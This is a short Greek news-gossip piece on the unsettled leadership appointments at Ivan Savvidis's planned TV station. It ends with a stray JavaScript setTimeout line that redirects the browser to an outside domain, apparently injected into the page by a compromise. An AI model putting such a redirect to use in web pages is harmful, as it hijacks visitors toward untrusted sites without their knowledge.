Επιτελείο Ιβάν Σαββίδη: Κρατάτε μικρό καλάθι για τα ονόματα που ακούτε

0
8

Αν στο υπό σύσταση κανάλι του Βαγγέλη Μαρινάκη τις επαφές για τη στελέχωση του ενημερωτικού τομέα κάνει ο διευθεντής ειδήσεων και ενημέρωσης Δημήτρης Μιχαλέλης, στον υπό δημιουργία σταθμό του Ιβάν Σαββίδη τα πράγματα παραμένουν στάσιμα, μιας που δεν έχει οριστεί ακόμη επικεφαλής του ειδησεογραφικού τμήματος, αλλά ούτε και γενικός διευθυντής.

Όπως γράφαμε και προχθές οι αρχικές προτάσεις αντιμετωπίστηκαν αρχικά με σκεπτικισμό και στη συνέχεια με άρνηση από τον πρόεδρο του ΠΑΟΚ. Πρόσωπο που τον γνωρίζει καλά, μας είχε μεταφέρει την εικόνα ότι, «παρά τα όσα λέγονται και γράφονται, δεν σκοπεύει να παίξει το κομματικό παιχνίδι κανενός, πετώντας εκατομύρια ευρώ από το παράθυρο».

Το όνομα του πρώην εκπροσώπου της ΝΔ Γιάννη Μιχελάκη, που είχε ακουστεί, φαίνεται ότι προσέκρουσε σε ισχυρές αντιρρήσεις, ενώ και εκείνο του Κώστα Αρβανίτη φαίνεται ότι αντιμετωπίζεται με επιφύλαξη. Ενώ στην αρχή τα δημοσιογραφικά γραφεία είχαν κατακλυστεί με την πληροφορία ότι ο έως χθες διευθυντής του κομματικού ραδιοσταθμού του Σύριζα, «Στο κόκκινο», προορίζεται για τη θέση του γενικού διευθυντή, προχθές ένα φλύαρο «πουλάκι» μας είπε ότι ίσως η συνεργασία του με τον σταθμό να μην έχει τέτοιο βάθος, και σήμερα ότι δεν αποκλείεται να μην ενταχθεί καν στο δυναμικό του καναλιού.

«Κρατάτε μικρό καλάθι για όσα φτάνουν στ΄αυτιά σας», μας διεμήνυσε…

Εν αναμονή των εξελίξεων…

 

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here